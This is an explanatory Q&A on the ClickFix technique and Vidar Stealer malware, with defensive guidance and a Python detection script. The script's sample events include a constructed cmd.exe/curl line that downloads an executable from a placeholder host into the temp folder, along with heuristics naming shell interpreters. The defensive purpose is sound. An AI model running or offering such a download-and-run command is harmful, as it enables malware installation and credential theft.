ClickFix Attacks and Vidar Stealer: What You Need to Know
The Australian Cyber Security Centre (ACSC) has issued a warning about a malicious campaign that leverages the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware. This Q&A covers the key details about the attack, how it works, and how to defend against it.
What is the ClickFix social engineering technique?
ClickFix is a deceptive technique used by cybercriminals to trick users into performing actions that compromise their security. It typically involves fake error messages or security alerts that prompt the user to click a button to ‘fix’ an issue. For example, a pop-up might claim that a software update is required or that a security problem needs immediate attention. When the user clicks the button, they unknowingly initiate a download or execute a malicious script. The technique exploits urgency and trust, making victims more likely to act without verifying the source. In the context of this campaign, ClickFix is used as the initial vector to deliver the Vidar Stealer malware.

What is Vidar Stealer and how does it work?
Vidar Stealer is a type of info-stealing malware that targets sensitive data from infected systems. Once installed, it collects credentials stored in browsers (such as saved passwords and cookies), cryptocurrency wallet information, browser history, and other personal data. It can also capture screenshots and steal files from specific directories. The malware operates stealthily in the background, then exfiltrates the stolen data to a command-and-control server operated by the attackers. Vidar Stealer is often sold on cybercrime forums as a commodity malware, making it accessible to a wide range of threat actors. Its primary goal is financial gain through credential theft, account takeovers, or cryptocurrency theft.
Who is behind this campaign and who are the targets?
The ACSC has identified the campaign as ongoing but has not attributed it to a specific threat actor. The targeting appears to be broad, affecting both individuals and organizations across various sectors. Given the use of ClickFix, which can be deployed via phishing emails, malicious websites, or even fake tech support calls, the campaign likely aims to infect as many users as possible. The Vidar Stealer payload is effective against Windows systems, and the stolen information can be used for further attacks, such as credential stuffing or spear-phishing. The geographic scope may be global, but the ACSC warning specifically addresses Australian businesses and residents. Organizations with valuable digital assets, such as financial institutions, e-commerce sites, and cryptocurrency exchanges, are especially at risk.
How does the ClickFix attack deliver Vidar Stealer?
The attack sequence typically begins with a social engineering lure, such as an email or a pop-up ad that displays a fake error message. For instance, the user might see a notification claiming their system is infected and needs an immediate update. The message includes a ‘Fix Now’ button that, when clicked, downloads a malicious script or executable. In some variations, the ClickFix lure prompts the user to open a command prompt and run a command that downloads the Vidar Stealer payload from a remote server. This technique bypasses common security measures because the user intentionally performs the action. Once executed, Vidar Stealer silently installs and begins harvesting data. The campaign often uses obfuscation techniques to evade antivirus detection, such as encoding the payload or using legitimate services like GitHub or Dropbox to host the malicious files.
What are the signs of infection, and how can it be detected?
Signs of a Vidar Stealer infection may include unusual system behavior such as unexpected network traffic, slow performance, or browser redirects. Since the malware steals credentials, users might notice unauthorized account logins or cryptocurrency transactions they did not initiate. To detect the infection, organizations can monitor for suspicious processes running from temporary folders or unusual command executions that match known Vidar Stealer indicators. Security teams should also look for outbound connections to IP addresses or domains associated with malware distribution. Endpoint detection and response (EDR) tools may flag the behavior of the malware attempting to access browser databases or password stores. Regular scanning with updated antivirus software can also identify the malicious files, though advanced variants may evade signature-based detection. If an infection is suspected, immediate isolation of the affected system is recommended.
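As an added illustration of the detection guidance above (this is example code written for this Q&A, not tooling from the ACSC advisory), the script below applies three heuristics to constructed process-creation records: a binary launched from a temp folder, a shell or script host whose command line reaches out to a remote URL, and a shell spawned directly by a browser. The event field names, paths and sample command lines are assumptions modelled loosely on EDR/Sysmon process-creation data.

```python
import re

# Constructed process-creation events (not real telemetry); the field names are an
# assumption loosely modelled on EDR/Sysmon process-creation records.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c curl http://update-check.invalid/fix.exe -o %TEMP%\fix.exe'},
    {"pid": 4133, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\fix.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\fix.exe"},
    {"pid": 5001, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile Get-ChildItem C:\Reports"},
    {"pid": 5100, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": r'"C:\Program Files\Vendor\updater.exe" --check https://vendor.example/version'},
]

INTERPRETERS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe")
TEMP_DIR = re.compile(r"\\(?:appdata\\local\\temp|windows\\temp|temp)\\", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the names of the heuristics an event trips (empty list means clean)."""
    hits = []
    image, parent = _basename(ev["image"]), _basename(ev["parent"])
    if TEMP_DIR.search(ev["image"]):
        hits.append("exec_from_temp")          # payload launched out of a temp folder
    if image in INTERPRETERS and URL.search(ev["cmdline"]):
        hits.append("interpreter_download")    # shell/script host fetching from a remote URL
    if image in INTERPRETERS and parent in BROWSERS:
        hits.append("browser_spawned_shell")   # lure page led straight to a command prompt
    return hits


def scan(events):
    """Map pid -> triggered heuristics for every event that tripped at least one."""
    return {ev["pid"]: score_event(ev) for ev in events if score_event(ev)}
```

Events 5001 and 5100 are included as benign controls: an administrator's PowerShell session and a vendor updater contacting a version URL trip none of the rules, while the lure-driven cmd.exe and the temp-folder binary it dropped each do.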

How can organizations protect themselves from ClickFix attacks?
- Employee training: Educate users about social engineering techniques like ClickFix. Emphasize not clicking on unexpected pop-ups or error messages, especially those requesting system-level actions.
- Technical controls: Block known malicious domains and implement web filtering to prevent access to adware or fake update sites. Restrict the ability to run scripts from the command prompt for non-admin users.
- Application whitelisting: Only allow approved software to execute, reducing the chance of unverified payloads running.
- Keep software updated: Regular patches for browsers and operating systems can close vulnerabilities that ClickFix lures might exploit.
- Use robust antivirus and EDR: Deploy tools that can detect anomalous behavior, even if the initial payload is obfuscated.
- Incident response plan: Prepare a clear procedure for isolating infected machines and preserving forensic evidence.
What should you do if you suspect a Vidar Stealer infection?
If you suspect an infection, disconnect the device from the network immediately to prevent data exfiltration. Run a full antivirus scan using up-to-date definitions. If malicious files are found, follow your organization’s incident response plan, which should include reporting to relevant authorities like the ACSC. Change all passwords for accounts accessed from the infected device, starting with email and financial accounts. Enable multi-factor authentication on all critical services. Monitor for unusual activity in online accounts, especially cryptocurrency wallets. In severe cases, a forensic analysis may be needed to determine the full scope of the breach. The ACSC recommends reporting any compromises to them for tracking and potential mitigation actions.